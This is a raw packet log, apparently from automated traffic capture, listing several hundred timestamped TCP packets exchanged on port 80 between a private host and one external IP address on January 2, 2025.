Jan 2, 2025 19:14:16.428426981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.428431988 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.428471088 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.428478003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.428488016 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.428488016 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.428525925 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.428533077 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.428546906 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.428550959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.428555965 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.428586006 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.428621054 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.509357929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.509432077 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.509438992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.509445906 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.509450912 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.509457111 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.509464025 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.509516954 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.509545088 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548012018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548053026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548058033 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548063040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548069000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548093081 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548122883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548129082 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548135042 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548157930 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548157930 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548333883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548340082 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548345089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548361063 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548365116 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548379898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548384905 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548388004 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548403978 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548404932 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548409939 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548417091 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548423052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548428059 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548434019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548439980 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548440933 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548446894 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548479080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548485041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548500061 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548500061 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548513889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548518896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548531055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548541069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548546076 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548569918 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548569918 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548569918 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548599005 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548635006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548635006 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548644066 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548660040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548666000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548701048 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548711061 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548804998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548810959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548823118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548827887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548835039 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548846006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548882008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548887014 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548887014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548894882 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548901081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548912048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548917055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.548921108 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548921108 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548962116 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.548962116 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549025059 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549037933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549050093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549055099 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549061060 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549067020 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549073935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549105883 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549119949 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549166918 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549173117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549184084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549190044 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549196005 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549201965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549207926 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549212933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549232960 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549257040 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549283028 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549308062 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549314022 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549326897 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549333096 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549339056 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549350977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549364090 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549371958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549376965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549380064 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549384117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549387932 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549423933 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549443007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549449921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549460888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549473047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549479961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549525023 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549551010 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549552917 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549559116 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549571037 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549595118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549598932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549606085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549611092 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549612045 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549660921 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.549690008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549698114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.549787998 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.550457001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550539017 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.550574064 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550580025 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550586939 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550592899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550599098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550605059 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550617933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550618887 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.550623894 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550705910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550709009 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.550712109 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550724030 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550729990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550761938 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.550801992 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.550813913 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550825119 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550831079 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550843000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550848961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550853968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550860882 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550865889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550868034 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.550872087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550878048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550884962 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550889969 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550895929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550904989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550913095 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.550944090 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550950050 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.550950050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550950050 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.550981998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.550996065 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.596247911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.596261978 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.596267939 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.596281052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.596287012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.596292973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.596298933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.596303940 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.596304893 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.596375942 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.596375942 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.635148048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635154009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635169983 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635175943 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635194063 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635199070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635205984 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635257959 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.635257959 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.635545015 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635607004 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635658026 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.635765076 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635771036 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635776997 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635782003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635787964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635792971 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635802031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635807037 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635812998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635818958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635824919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635831118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635843992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635849953 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635860920 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635868073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635885954 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.635895967 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635905981 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.635912895 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635920048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635926008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635936975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635943890 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.635956049 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.635956049 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636018038 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636030912 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636038065 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636049986 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636054993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636066914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636073112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636080027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636085987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636091948 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636106014 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636120081 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636157990 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636187077 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636193991 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636198997 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636204958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636212111 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636224031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636229038 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636234999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636240959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636250973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636253119 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636253119 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636257887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636271000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636276960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636285067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636303902 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636303902 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636329889 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636332035 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636347055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636353016 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636358023 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636363983 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636374950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636382103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636395931 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636415958 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636492968 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636516094 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636523008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636535883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636595011 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636627913 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636635065 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636641026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636646032 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636651993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636657953 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636668921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636674881 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636708021 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636708021 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.636735916 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636749983 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636754990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636759996 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636766911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.636810064 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.637990952 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638046980 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.638067961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638073921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638081074 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638087034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638098955 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638106108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638142109 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.638142109 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.638293028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638299942 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638310909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638318062 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638324022 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638329983 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638335943 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638340950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638348103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638360023 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.638384104 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.638411999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638423920 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638431072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638442993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638448954 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638454914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638461113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638464928 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.638525009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638528109 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.638530970 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638541937 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638546944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638560057 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638566971 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638572931 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.638587952 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.638622999 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.638736010 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.683084011 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.683132887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.683146954 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.683154106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.683160067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.683161020 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.683173895 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.683182001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.683192968 CET	49721	80	192.168.2.5	147.45.44.131
